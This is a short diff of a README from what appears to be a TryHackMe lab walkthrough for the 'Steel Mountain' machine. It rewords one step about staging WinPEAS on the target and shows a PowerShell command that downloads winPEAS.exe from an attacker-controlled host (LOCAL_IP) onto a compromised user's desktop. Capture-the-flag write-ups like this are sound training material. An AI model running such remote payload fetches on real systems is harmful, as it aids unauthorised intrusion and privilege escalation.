EvanDiamantidis/TryHackMe/Machines/Steel Mountain/README.md

 <br />

-Get a copy of [WinPEAS.exe](https://github.com/carlospolop/PEASS-ng/releases) that we can use to upload to the target machine, then proceed to place it on the desktop folder of the current user.
+Grab a copy of [WinPEAS.exe](https://github.com/carlospolop/PEASS-ng/releases) that we can use to upload to the target machine, then proceed to place it on the desktop folder of the current user.

 ```
 C:\Users\bill\Desktop>powershell -c wget "http://LOCAL_IP:80/winPEAS.exe" -outfile "winpeas.exe"